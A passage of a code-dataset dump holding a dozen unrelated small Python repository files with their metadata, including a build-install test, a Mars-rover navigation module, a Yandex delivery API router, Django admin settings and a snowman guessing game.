])\n\n if PLATFORM != 'windows':\n files.extend([\n { 'path' : dirprfx + '/my-script.link.py', 'chmod' : 0o755, },\n ])\n files.extend([\n { 'path' : dirprfx + '2/my-script.link.py', 'linkto' : './my-script.py' },\n ])\n else:\n # unknown project, forgot to add ?\n assert False\n\n for item in files:\n item['path'] = item['path'].replace('/', os.sep)\n\n fixtures['files'] = files\n\n return fixtures\n\n @pytest.fixture(params = INSTALL_FIXTURE_PARAMS, ids = lambda x: x[0]['id'])\n def installFixtures(self, request, tmpdir):\n\n testdir = str(tmpdir.realpath())\n fixturesList = request.param\n fixturesList = [self._prepareFixtures(x.copy(), testdir) for x in fixturesList]\n\n return fixturesList\n\n def test(self, allZmExe, project, installFixtures):\n\n def handlePath(path, svars):\n return substBuiltInVars(path, 
svars).replace('/', os.sep)\n\n for fixtures in installFixtures:\n\n fixtures = fixtures.copy()\n destdir = fixtures.destdir\n\n cmdLine = ['install', '--destdir', destdir]\n cmdLine.extend(fixtures.installArgs)\n exitcode, _, _ = runZm(self, cmdLine)\n assert exitcode == 0\n\n processConfManagerWithCLI(self, cmdLine)\n checkBuildWorkDir(self)\n\n svars = self.confManager.root.builtInVars\n\n for item in fixtures['files']:\n filepath = handlePath(item['path'], svars)\n if os.path.isabs(filepath):\n # path must be relative because of os.path.join\n filepath = os.path.splitdrive(filepath)[1].lstrip(os.sep)\n filepath = joinpath(destdir, filepath)\n\n if 'linkto' in item:\n linkto = handlePath(item['linkto'], svars)\n assert islink(filepath)\n assert linkto == os.readlink(filepath)\n else:\n assert isfile(filepath)\n if PLATFORM != 'windows':\n chmodExpected = oct(item.get('chmod', 0o644))[-3:]\n chmodReal = oct(os.stat(filepath).st_mode)[-3:]\n assert chmodReal == chmodExpected\n\n cmdLine[0] = 'uninstall'\n exitcode, _, _ = runZm(self, cmdLine)\n assert exitcode == 0\n assert not os.path.exists(destdir)\n","repo_name":"pustotnik/zenmake","sub_path":"tests/func_install_test.py","file_name":"func_install_test.py","file_ext":"py","file_size_in_byte":11743,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"4755556427","text":"#encoding:gbk\nfrom tkMessageBox import showwarning\n'''\nhttps://www.cnblogs.com/qqnnhhbb/p/3601844.html\n'''\nimport win32com.client as handler\nfrom Tkinter import Tk\nfrom time import sleep\nwarn = lambda : showwarning(\"EXCEL\",'Exit?')\n\ndef makeExcel():\n work=handler.gencache.EnsureDispatch('Excel.Application')\n book=work.Workbooks.Add()\n work.DisplayAlerts = False\n sh=book.ActiveSheet\n work.Visible=True\n sleep(1)\n sh.Cells(1,1).Value='来自py 自动生成'\n sleep(1)\n for i in range(2,30):\n print(type(i),i)\n cells = sh.Cells(i, 1)\n cells.Value='Line %d' % i\n sleep(0.2)\n sh.Cells(i+2,1).Value='from py automatic '\n # warn()\n file=r'C:\\Users\\ck\\Desktop\\123.xlsx'\n book.SaveAs(file)\n work.Application.Quit()\nif __name__=='__main__':\n Tk().withdraw()\n makeExcel()\n\n","repo_name":"While1true/office","sub_path":"office/excel.py","file_name":"excel.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70469795144","text":"import pytest\n\nimport torch\nfrom mugen.trainingmodules import Text2ImageTrainingModule\n\n@pytest.mark.skip(reason=\"Test runs too long\")\n@pytest.mark.parametrize(\n \"batch\",\n [\n {\n \"latent\": torch.rand(1, 4, 16, 16),\n \"text_embedding\": torch.rand(1, 768)\n },\n ]\n)\ndef test_forward(batch):\n module = Text2ImageTrainingModule('CompVis/stable-diffusion-v1-4')\n\n with pytest.raises(Exception):\n output = module.training_step(batch, 0, 0)\n assert isinstance(output, torch.Tensor)\n","repo_name":"hoang1007/finetuning-diffusers","sub_path":"tests/trainingmodules/test_text2image.py","file_name":"test_text2image.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71524286344","text":"# -*- coding: utf-8 -*-\n\nfrom decimal import Decimal\nfrom django import template\n\nregister = template.Library()\n\n@register.filter\ndef bewertung(value, einheit='PUNKT'):\n if value is None:\n return ''\n elif einheit == 'ZEIT':\n return zeit2str(value)\n else:\n if value == 0:\n return 
'0'\n return '%.01f' % value\n\ndef zeit2str(value):\n assert isinstance(value, Decimal)\n minutes = value // 60\n fractional_seconds = value - (minutes * 60)\n seconds = fractional_seconds // 1\n millis = (fractional_seconds - seconds) * 100\n value = '%d:%02d.%02d' % (minutes, seconds, millis)\n return value\n\n","repo_name":"danielsteinmann/sasse","sub_path":"sasse/templatetags/sasse.py","file_name":"sasse.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"70608799625","text":"import numpy as np\nimport time\nfrom perception import to_polar_coords\n\ndef slice_polar_coords(dist, angles, dist_range, angle_range):\n \"\"\"\n Returns a subset of pixel radial distances and angles, such that any pixel's radial distance and angle fall within specified range\n :param dist: list of pixel radial distances\n :param angles: list of corresponding pixel angles in degrees\n :param dist_range: binding range for radial distances\n :param angle_range: binding range for angles in degrees\n :return: list of distances and corresponding list of angles\n \"\"\"\n # find an intersection of indices that satisfy distance and angle thresholds\n indices_slice = list(filter(lambda idx: angles[idx] <= angle_range[1] and \\\n angles[idx] >= angle_range[0] and \\\n dist[idx] <= dist_range[1] and \\\n dist[idx] >= dist_range[0],range(len(angles))))\n\n # create a list of distance and angles that correspond to above indices\n dist1 = list()\n angles1 = list()\n dist1 = [dist[idx] for idx in indices_slice]\n angles1 = [angles[idx] for idx in indices_slice]\n\n if len(dist1) == 0: # if no index found i.e dist1 is empty, return None\n return None, None\n else:\n return dist1, angles1\n\ndef no_obstacle_ahead(dist, angles, thresh_dist, angle_thresh, min_dist_from_wall):\n \"\"\"\n Determines if terrain is navigable and returns a list of navigable-beam bounding angles\n :param dist: array of radial distances\n :param angles: array of polar angles in degrees\n :param thresh: minimum distance threshold\n :param angle_thresh: minimum navigable-beam angular width\n :return: boolean indicating no obstacle (True) and list of tuples, where each tuple is a pair of bounding angles of a navigable region\n \"\"\"\n\n # Method for determining beams\n #Create angular bins of size 0.5 degrees. 
Each bin angle corresponds to a beamlet\n angle_bins = np.linspace(-45, 45, 181)\n\n # copy dist and angles so as not to modify original\n new_dist = list(dist)\n new_angles = list(angles)\n\n # return indices to the bin to which each angle corresponds\n indices = np.digitize(new_angles, angle_bins)\n\n # create a dictionary with bin angle values as keys, and all distances that fall within that bin\n dict_of_dists_in_beamlets = {}\n for ang in angle_bins:\n dict_of_dists_in_beamlets[ang] = list()\n\n # populate each dictionary key by list of distances that correspond to\n # angles that belong to that key\n count = 0\n for idx in indices:\n if idx > 0 and idx <= len(angle_bins):\n dict_of_dists_in_beamlets[angle_bins[idx - 1]].append(new_dist[count])\n count += 1\n\n # for dictionary key that have empty list (no angle falls in that beamlet/potentially an obstacle),\n # assign -1\n for key, value in dict_of_dists_in_beamlets.items():\n if len(value) == 0:\n dict_of_dists_in_beamlets[key] = [-1]\n\n # find continuous beams, composed of consecutive beamlets\n list_of_nav_beamlets = []\n list_of_beamlet_bounding_angles = []\n in_ones = False\n # iterate through key, value pairs in the dictionary\n for key, value in dict_of_dists_in_beamlets.items():\n # create a list of all distances below a certain distance\n tmplist = list(filter(lambda elm: elm < (thresh_dist/abs(np.sin(45*np.pi/180)) + 20), value))\n if len(tmplist) != 0: # If beamlet has potentially navigable terrain in near field, check for obstacles in the range\n # from threshold to near field end, its max pixel should be in the mid near field. If that's not the case, mid near field for that\n # beamlet is not navigable and therefore that beamlet is excluded\n if np.amax(tmplist) > thresh_dist/abs(np.sin(45*np.pi/180)):\n #list_of_mins.append(1)\n if not in_ones:\n list_of_beamlet_bounding_angles.append([key, -45])\n in_ones = True\n else:\n list_of_beamlet_bounding_angles[-1].pop()\n list_of_beamlet_bounding_angles[-1].append(key)\n else:\n if in_ones:\n in_ones = False\n\n else:\n in_ones = False\n\n list_of_nav_beam_angles = list(filter(lambda elm: (elm[1] - elm[0]) > angle_thresh, list_of_beamlet_bounding_angles))\n\n dist1 = []\n angle1 = []\n\n for elm in list_of_nav_beam_angles:\n for ang in np.linspace(elm[0], elm[1], (elm[1] - elm[0]) // 0.5 + 1):\n dist1.append(15)\n angle1.append(ang)\n\n return (True if (len(list_of_nav_beam_angles) > 0 and \\\n get_steer_angle(list_of_nav_beam_angles, 5) != None) else False, \\\n list_of_nav_beam_angles)\n\ndef get_steer_angle(list_angles_pairs, max_allowed_angle):\n \"\"\"\n :param list_angles_pairs: list of tuples, where each tuple represents angular bounds of navigable-beam (in degrees)\n :param max_allowed_angle: maximum value for angular direction in degrees. 
in rover terms, left corresponds to positive, right negative\n :return: steer angle\n \"\"\"\n #sort list of angle pairs by the second element in the pair (larger or lefter angles)\n list_angles_pairs.sort(reverse = True, key=lambda x:x[1])\n for angle_pair in list_angles_pairs:\n if max_allowed_angle > angle_pair[1]:\n return (angle_pair[1] + angle_pair[0])/2\n elif max_allowed_angle <= angle_pair[1] and max_allowed_angle >= angle_pair[0]:\n return (max_allowed_angle + angle_pair[0])/2\n else:\n pass\n return None\n\ndef decision_step(Rover):\n # Implement conditionals to decide what to do given perception data\n # Here you're all set up with some basic functionality but you'll need to\n # improve on this decision tree to do a good job of navigating autonomously!\n\n # Example:\n # Check if we have vision data to make decisions with\n if (Rover.nav_angles is not None):\n # determine if obstacle ahead\n no_obs, list_of_angle_pairs = no_obstacle_ahead(Rover.nav_dists, Rover.nav_angles*180/np.pi, 30, 10,40)\n\n # Forward mode\n if Rover.mode == 'forward':\n # if there is no obstacle, determine steer angle and move in its direction\n if no_obs:\n Rover.steer = get_steer_angle(list_of_angle_pairs, Rover.max_allowed_left)\n # if velocity is below maximum allowable velocity, set throttle to max possible\n if Rover.vel < Rover.max_vel:\n Rover.throttle = Rover.throttle_set\n Rover.brake = 0\n else: # Else coast\n Rover.throttle = 0\n Rover.brake = 0\n\n # if there is obstacle ahead, brake (in proportion to velocity) and move to stop mode\n else:\n Rover.throttle = 0\n Rover.brake = max(Rover.brake_set, Rover.vel)\n Rover.steer = 0\n Rover.mode = 'stop'\n\n # Stop mode\n elif Rover.mode == 'stop':\n # If we're in stop mode but still moving keep braking\n if Rover.vel > 0.1:\n Rover.throttle = 0\n Rover.brake = max(Rover.brake_set, Rover.vel)\n Rover.steer = 0\n # If we're not moving (vel < 0.2) then do something else\n elif Rover.vel <= 0.1: # stopped\n # obstacle ahead\n if not no_obs:\n Rover.throttle = 0\n # Release the brake to allow turning\n Rover.brake = 0\n # turn to right by 10 degree\n Rover.steer = -10\n\n # no obstacle ahead, therefore increase speed\n if no_obs:\n # Set throttle back to stored value\n Rover.throttle = Rover.throttle_set\n # Release the brake\n Rover.brake = 0\n # Set steer to mean angle\n Rover.steer = get_steer_angle(list_of_angle_pairs, Rover.max_allowed_left)\n Rover.mode = 'forward'\n\n # if rover's velocity is not increasing despite throttle, it is blocked\n elif Rover.mode == 'blocked':\n # Now we're stopped and we have vision data to see if there's a path forward\n Rover.throttle = 0\n # Release the brake to allow turning\n Rover.brake = 0\n # Turn range is +/- 15 degrees, when stopped the next line will induce 4-wheel turning\n Rover.steer = -20 # Could be more clever here about which way to turn\n\n Rover.mode = 'forward'\n\n # Just to make the rover do something\n # even if no modifications have been made to the code\n else:\n Rover.throttle = Rover.throttle_set\n Rover.steer = 0\n Rover.brake = 0\n\n\n # # If in a state where want to pickup a rock send pickup command\n # if Rover.near_sample and Rover.vel == 0 and not Rover.picking_up:\n # Rover.send_pickup = True\n\n return 
Rover","repo_name":"kasliwalr/robotics","sub_path":"Courses/Udacity-RoboticsSW-Nanodegree/Sample-Search-And-Return/code/decision.py","file_name":"decision.py","file_ext":"py","file_size_in_byte":9446,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"29106923908","text":"import os\nimport json\nimport uuid\nimport requests\n\nfrom pydantic import BaseModel\nfrom fastapi import Request, APIRouter, File, UploadFile\n\nya = APIRouter()\n\n\n@ya.get('/api/ya/claims/search/active/')\ndef search():\n auth_key = os.getenv('YA_AUTH_KEY', 'NOT_A_KEY')\n\n try:\n url = 'https://b2b.taxi.yandex.net/b2b/cargo/integration/v2/claims/search/active'\n\n payload = {\n \"limit\": 10,\n \"offset\": 0\n }\n\n headers = {\n 'Authorization': f'Bearer {auth_key}',\n 'Accept-Language': 'ru'\n }\n\n response = requests.request(\"POST\", url, headers=headers, data=json.dumps(payload))\n\n claims = json.loads(response.text)['claims'];\n print(list(map(lambda claim: {'id': claim['id'], 'version': claim['revision']}, claims)))\n\n return {\n 'url': url,\n 'response': json.loads(response.text)\n }\n\n except Exception as e:\n print(e)\n return {\n \"status\": \"FAILURE\"\n }\n\n\nclass CreateRq(BaseModel):\n point: list\n text: str\n\n\n@ya.post('/api/ya/claims/create')\ndef create(body: CreateRq):\n auth_key = os.getenv('YA_AUTH_KEY', 'NOT_A_KEY')\n\n try:\n url = 'https://b2b.taxi.yandex.net/b2b/cargo/integration/v2/claims/create'\n\n payload = {\n \"client_requirements\": {\n \"cargo_loaders\": 0,\n \"taxi_class\": \"courier\"\n },\n \"items\": [\n {\n \"cost_currency\": \"RUR\",\n \"cost_value\": \"100\",\n \"pickup_point\": 1,\n \"droppof_point\": 2,\n \"quantity\": 1,\n \"size\": {\n \"height\": 0.4,\n \"length\": 0.4,\n \"width\": 0.2\n },\n \"title\": \"Еда.\",\n \"weight\": 1\n }\n ],\n \"optional_return\": False,\n \"route_points\": [\n {\n \"point_id\": 1,\n \"visit_order\": 1,\n \"contact\": {\n \"name\": \"Иван\",\n \"phone\": \"+79138886060\"\n },\n \"type\": \"source\",\n \"address\": {\n \"city\": \"Томск\",\n \"coordinates\": [\n 84.94564528465693,\n 56.493949481830924\n ],\n \"country\": \"Россия\",\n \"description\": \"\",\n \"comment\": \"ЮЖАНЕ, ресторан, Карла Маркса, 23а\",\n \"fullname\": \"ЮЖАНЕ, ресторан, Карла Маркса, 23а\",\n \"shortname\": \"ЮЖАНЕ, ресторан, Карла Маркса, 23а\",\n \"street\": \"Карла Маркса\",\n \"building\": \"23а\"\n }\n },\n {\n \"point_id\": 2,\n \"visit_order\": 2,\n \"contact\": {\n \"name\": \"Иван\",\n \"phone\": \"+79138886060\"\n },\n \"type\": \"destination\",\n \"address\": {\n \"country\": \"Россия\",\n \"description\": \"\",\n \"fullname\": body.text,\n \"shortname\": body.text,\n \"street\": body.text,\n \"building\": body.text,\n \"coordinates\": body.point\n }\n }\n ]\n }\n\n headers = {\n 'Authorization': f'Bearer {auth_key}',\n 'Accept-Language': 'ru'\n }\n\n response = requests.request(\n \"POST\",\n url,\n headers=headers,\n data=json.dumps(payload),\n params={\n \"request_id\": str(uuid.uuid4())\n }\n )\n\n return {\n 'url': url,\n 'request': json.loads(response.text),\n 'response': payload\n }\n\n except Exception as e:\n print(e)\n return {\n \"status\": \"FAILURE\"\n }\n\n\ndef cancel_request(cid, version):\n auth_key = os.getenv('YA_AUTH_KEY', 'NOT_A_KEY')\n url = 'https://b2b.taxi.yandex.net/b2b/cargo/integration/v1/claims/cancel'\n\n payload = {\n \"cancel_state\": \"free\",\n \"version\": version\n }\n\n headers = {\n 'Authorization': f'Bearer {auth_key}',\n 'Accept-Language': 'ru'\n 
}\n\n params = {\n 'claim_id': cid\n }\n\n return {\n 'request': payload,\n 'response': json.loads(\n requests.request(\"POST\", url, headers=headers, data=json.dumps(payload), params=params).text),\n }\n\n\n@ya.get('/api/ya/claims/cancel')\ndef cancel_all():\n auth_key = os.getenv('YA_AUTH_KEY', 'NOT_A_KEY')\n\n try:\n\n url = 'https://b2b.taxi.yandex.net/b2b/cargo/integration/v2/claims/search/active'\n\n payload = {\n \"limit\": 10,\n \"offset\": 0\n }\n\n headers = {\n 'Authorization': f'Bearer {auth_key}',\n 'Accept-Language': 'ru'\n }\n\n response = requests.request(\"POST\", url, headers=headers, data=json.dumps(payload))\n\n claims = json.loads(response.text)['claims']\n\n responses = list(map(lambda claim: cancel_request(claim['id'], claim['revision']), claims))\n\n return {\n 'responses': responses\n }\n\n except Exception as e:\n print(e)\n return {\n \"status\": \"FAILURE\"\n }\n\n\ndef accept_request(cid):\n auth_key = os.getenv('YA_AUTH_KEY', 'NOT_A_KEY')\n url = 'b2b.taxi.yandex.net/b2b/cargo/integration/v1/claims/accept'\n payload = {\n \"version\": 1\n }\n\n headers = {\n 'Authorization': f'Bearer {auth_key}',\n 'Accept-Language': 'ru'\n }\n\n params = {\n 'claim_id': cid\n }\n\n response = requests.request(\"POST\", url, headers=headers, data=json.dumps(payload), params=params)\n\n return {\n 'request': payload,\n 'response': json.loads(response.text)\n }\n\n\n@ya.get('/api/ya/claims/accept/')\ndef accept_all():\n auth_key = os.getenv('YA_AUTH_KEY', 'NOT_A_KEY')\n\n try:\n url = 'https://b2b.taxi.yandex.net/b2b/cargo/integration/v2/claims/search/active'\n\n payload = {\n \"limit\": 10,\n \"offset\": 0\n }\n\n headers = {\n 'Authorization': f'Bearer {auth_key}',\n 'Accept-Language': 'ru'\n }\n\n response = requests.request(\"POST\", url, headers=headers, data=json.dumps(payload))\n\n claims = json.loads(response.text)['claims']\n\n responses = list(map(lambda claim: accept_request(claim['id']), claims))\n\n return {\n 'responses': responses\n }\n\n except Exception as e:\n print(e)\n return {\n \"status\": \"FAILURE\"\n }\n","repo_name":"RakhimBek/normapi","sub_path":"api/routers/yandex.py","file_name":"yandex.py","file_ext":"py","file_size_in_byte":7117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33361094437","text":"\"\"\"Handle the raw data input/output and interface with external formats.\"\"\"\n\nfrom obspy.core import read\nfrom obspy.core.utcdatetime import UTCDateTime\nimport pandas as pd\nimport datetime as dt\n\n\ndef load_stream(path):\n \"\"\"Loads a Stream object from the file at path.\n\n Args:\n path: path to the input file, (for supported formats see,\n http://docs.obspy.org/tutorial/code_snippets/reading_seismograms.html)\n\n Returns:\n an obspy.core.Stream object\n (http://docs.obspy.org/packages/autogen/obspy.core.stream.Stream.html#obspy.core.stream.Stream)\n \"\"\"\n\n stream = read(path)\n stream.merge()\n\n # assert len(stream) == 3 # We need X,Y,Z traces\n\n return stream\n\n\ndef load_catalog(path):\n \"\"\"Loads a event catalog from a .csv file.\n\n Each row in the catalog references a know seismic event.\n\n Args:\n path: path to the input .csv file.\n\n Returns:\n catalog: A Pandas dataframe.\n \"\"\"\n\n catalog = pd.read_csv(path)\n # Check if utc_timestamp exists, otherwise create it\n if 'utc_timestamp' not in catalog.columns:\n utc_timestamp = []\n for e in catalog.origintime.values:\n utc_timestamp.append(UTCDateTime(e).timestamp)\n catalog['utc_timestamp'] = utc_timestamp\n 
return catalog\n\n\ndef write_stream(stream, path):\n stream.write(path, format='MSEED')\n\n\ndef write_catalog(events, path):\n catalog = pd.DataFrame(\n {'utc_timestamp': pd.Series([t.timestamp for t in events])})\n catalog.to_csv(path)\n\ndef write_catalog_with_clusters(events, clusters, latitudes, longitudes, depths, path):\n catalog = pd.DataFrame(\n {'utc_timestamp': pd.Series([t for t in events]),\n \"cluster_id\": pd.Series([cluster_id for cluster_id in clusters]),\n \"latitude\": pd.Series([lat for lat in latitudes]),\n \"longitude\": pd.Series([lon for lon in longitudes]),\n \"depth\": pd.Series([d for d in depths])})\n catalog.to_csv(path)\n\n","repo_name":"tperol/ConvNetQuake","sub_path":"quakenet/data_io.py","file_name":"data_io.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","stars":179,"dataset":"github-code","pt":"81"} +{"seq_id":"75053980743","text":"import math\nimport random\nimport time\n\nfrom bpnet import bpnet\n\nclass ESIndividual:\n \"\"\"\n tar_vars is a list of target var\n steps is a list of standard deviation\n SD is a var of standard deviation\n delta is a var of S.D of each weight of tar_vars\n tar_vars = [nhl, nhmax, N]\n \"\"\"\n def __init__(self, ni, no, tar_vars, steps, bound, SD, delta):\n self.ni = ni\n self.no = no\n self.tar_vars = tar_vars\n self.steps = steps\n self.bound = bound\n self.SD = SD\n self.delta = delta\n self.fitness = 0\n self.bp = bpnet(self.ni, int(round(self.tar_vars[0])), int(round(self.tar_vars[1])), self.no, self.tar_vars[2])\n\n def mutate_tar_vars(self):\n N = random.gauss\n for key, item in enumerate(self.tar_vars):\n self.tar_vars[key] = item + N(0, self.steps[key])\n while self.tar_vars[key] < self.bound[key][0] \\\n or self.tar_vars[key] > self.bound[key][1]:\n self.tar_vars[key] = int(round(item + N(0, self.steps[key])))\n\n def mutate_adaptive(self):\n N = random.gauss\n for key, item in enumerate(self.steps):\n self.steps[key] = item*math.exp(N(0, self.SD) + N(0, self.delta))\n\n def generate(self):\n N = random.gauss\n mutate_steps = [item * math.exp(N(0, self.SD) + N(0, self.delta)) for item in self.steps]\n\n mutate_vars = []\n for key, item in enumerate(self.tar_vars):\n var = item + N(0, self.steps[key])\n while var < self.bound[key][0] \\\n or var > self.bound[key][1]:\n if 0 <= key<=1:\n var = int(round(item + N(0, self.steps[key])))\n else:\n var = item + N(0, self.steps[key])\n mutate_vars.append(var)\n return ESIndividual(self.ni, self.no, mutate_vars, mutate_steps, self.bound, self.SD, self.delta)\n\n def run(self, train_data):\n start = time.time()\n self.mutate_tar_vars()\n self.mutate_adaptive()\n self.bp.train(train_data, 4.1)\n self.fitness = time.time()-start\n\n def __repr__(self):\n return repr(self.fitness)\n\n","repo_name":"Lehyu/Code","sub_path":"DIP/Pro2/ESIndividual.py","file_name":"ESIndividual.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29458151824","text":"from django.contrib import admin\nfrom biblioteca.models import Autor\nfrom biblioteca.models import Libro\nfrom biblioteca.models import Ejemplar\nfrom biblioteca.models import Usuario\n\nclass LibroInline(admin.TabularInline):\n model = Libro\n\n\nclass LibroAdmin(admin.ModelAdmin):\n list_display = ('Titulo','Editorial','Autor')\n list_display_links = ('Titulo','Editorial')\n\nclass UsuarioAdmin(admin.ModelAdmin):\n list_display = ('Nombre','Telefono')\n fieldsets =(\n 
('Datos',{\n 'fields': ('Nombre',)\n }),\n ('Contacto',{\n 'fields': ('Telefono','Direccion')\n })\n )\n\nclass EjemplarAdmin(admin.ModelAdmin):\n list_display = ('NombreLibro', 'NombreEditorial')\n list_filter = ('Libro',)\n\nclass AutorAdmin(admin.ModelAdmin):\n list_display = ('Codigo','Nombre')\n inlines = [LibroInline]\n search_fields = ['Nombre',]\n\nadmin.site.register(Autor,AutorAdmin)\nadmin.site.register(Libro,LibroAdmin)\nadmin.site.register(Ejemplar,EjemplarAdmin)\nadmin.site.register(Usuario,UsuarioAdmin)\n","repo_name":"DiogenesPuig/Ejercicios-con-Django","sub_path":"Ejercicio 1/biblioteca/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27743037336","text":"SNOWMAN_WORD= 'snowman'\nSNOWMAN_WRONG_GUESSES = 7\nSNOWMAN_1 = '* * * '\nSNOWMAN_2 = ' * _ * '\nSNOWMAN_3 = ' _[_]_ * '\nSNOWMAN_4 = ' * (\") '\nSNOWMAN_5 = ' \\( : )/ *'\nSNOWMAN_6 = '* (_ : _) '\nSNOWMAN_7 = '-----------'\nencrypt_list= []\n\n\ndef get_letter_from_user():\n flag_one_letter = False\n letter_from_user = None\n while not flag_one_letter:\n letter_from_user = input('Enter a letter: ').lower()\n if not letter_from_user.isalpha():\n print(\"Invalid character, please enter a letter.\")\n elif len(letter_from_user) > 1:\n print('You should input one single letter.')\n else:\n flag_one_letter = True\n return letter_from_user\n\ndef snowman():\n flag_correct_guess= False\n count_correct_guesses = 0\n count_wrong_guesses = 0\n while not flag_correct_guess and count_wrong_guesses < SNOWMAN_WRONG_GUESSES: \n letter = get_letter_from_user()\n if letter in SNOWMAN_WORD:\n count_correct_guesses += 1\n if count_correct_guesses == SNOWMAN_WRONG_GUESSES:\n flag_correct_guess = True \n else:\n count_wrong_guesses += 1\n draw_snowman(count_wrong_guesses)\n \n result = f\"You made {count_correct_guesses} correct and {count_wrong_guesses} incorrect guesses\" \n return result\n \ndef draw_snowman(count_wrong_guesses):\n for item in range(SNOWMAN_WRONG_GUESSES +1 - count_wrong_guesses, SNOWMAN_WRONG_GUESSES+1):\n if item == 1:\n print(SNOWMAN_1)\n elif item == 2:\n print(SNOWMAN_2)\n elif item ==3:\n print(SNOWMAN_3)\n elif item ==4:\n print(SNOWMAN_4) \n elif item ==5:\n print(SNOWMAN_5)\n elif item ==6:\n print(SNOWMAN_6) \n elif item ==7: \n print(SNOWMAN_7) \n\nsnowman() ","repo_name":"Anagabsoares/AdaPrecourse","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"43272856737","text":"from collections import defaultdict, Counter\n\nNUCLEOTIDES = ['A', 'T', 'C', 'G']\nCOMPLIMENTS = {'A': 'T', 'T': 'A', 'G': 'C', 'C': 'G'}\n\n\ndef count_nucleotides(strand: str) -> dict:\n \"\"\"\n Returns a dictionary containing the number of times each nucleotide is present in the strand.\n\n :param strand: A sequence of nucleotides\n \"\"\"\n return dict(Counter(strand))\n\n\ndef validate_strand(strand: str) -> bool:\n \"\"\"\n Check the strand for invalid bases\n \"\"\"\n strand = strand.upper()\n count = dict(Counter(strand))\n for k in count.keys():\n if k not in NUCLEOTIDES:\n raise Exception(\"Invalid DNA sequence\")\n return True\n\n\ndef transcription(strand: str) -> str:\n \"\"\"\n Returns the RNA transcription of the DNA.\n \"\"\"\n return strand.replace('T', 'U')\n\n\ndef coloured(seq):\n base_colours = {\n \"A\": '\\033[92m',\n 'C': '\\033[94m',\n 'G': 
'\\033[93m',\n 'T': '\\033[91m',\n 'U': '\\033[91m',\n 'reset': '\\033[0;0m'\n }\n\n temp_str = \"\"\n\n for nuc in seq:\n if nuc in base_colours:\n temp_str += base_colours[nuc] + nuc\n else:\n temp_str += base_colours['reset'] + nuc\n\n return temp_str + '\\033[0;0m'\n","repo_name":"RavinSG/Computational_Biology","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3943388853","text":"from keras.models import load_model, Model\nfrom src.common import sample_layer, utils\n\nmodel_path = 'path/to/saved_model'\nvae_model = load_model(model_path, custom_objects={'SampleLayer': sample_layer.SampleLayer})\nencoder_output_layer = 'sampling_layer'\ndecoder_input_layer = 'decoder_inp'\n\nenc_model = Model(inputs=[vae_model.input], outputs=[vae_model.get_layer('sampling_layer').output])\n\nmodel_splitter = utils.SplitModel(parent_model=vae_model)\n\nstart_idx = model_splitter.get_layer_idx_by_name(layername=decoder_input_layer)\nend_idx = len(vae_model.layers)\n\ndec_model = model_splitter.split_model(start=start_idx, end=end_idx)\n\nprint(enc_model.summary())\n","repo_name":"Knight13/beta-VAE-disentanglement","sub_path":"conifg.py","file_name":"conifg.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"81"} +{"seq_id":"71724414025","text":"from typing import List\nfrom spotipy import oauth2\nimport attr\nimport spotipy\n\n\n@attr.s(frozen=True)\nclass Artist:\n id: str = attr.ib()\n name: str = attr.ib()\n\n\n@attr.s(frozen=True)\nclass Track:\n name: str = attr.ib()\n artists: List[Artist] = attr.ib()\n\n\nclass SpotipyService:\n def __init__(self, client_id: str, client_secret: str) -> None:\n credentials = oauth2.SpotifyClientCredentials(\n client_id=client_id,\n client_secret=client_secret\n )\n token = credentials.get_access_token()\n self.sp = spotipy.Spotify(auth=token)\n\n def get_tracks_in_playlist(self, user_uri: str, playlist_uri: str) -> List[Track]:\n all_tracks: List[Track] = []\n\n playlist_data = self.sp.user_playlist(\n user_uri, playlist_uri, fields='tracks,next')\n tracks = playlist_data['tracks']\n\n all_tracks = self._read_tracks_page(all_tracks, tracks)\n\n # This is required to hand track pagnation\n while tracks['next']:\n tracks = self.sp.next(tracks)\n all_tracks = self._read_tracks_page(all_tracks, tracks)\n\n return all_tracks\n\n def _read_tracks_page(self, all_tracks: List[Track], tracks: any) -> List[Track]:\n for track in tracks['items']:\n all_tracks.append(self._parse_track(track['track']))\n\n return all_tracks\n\n @staticmethod\n def _parse_track(raw_track: any) -> Track:\n return Track(\n raw_track['name'],\n [Artist(artist['id'], artist['name']) for artist in raw_track['artists']]\n )\n","repo_name":"benfernandes/Spotifave","sub_path":"spotifave/spotipy_service.py","file_name":"spotipy_service.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9922712694","text":"import pandas as pd \r\nimport numpy as np\r\n\r\ndef timetable_to_datetime(timetable_file):\r\n #load original csv\r\n data = pd.read_csv(timetable_file, header=None)\r\n #remove empty columns\r\n data.dropna(axis='columns', inplace=True)\r\n #remove ellipses\r\n data = data[data[0]!='. . 
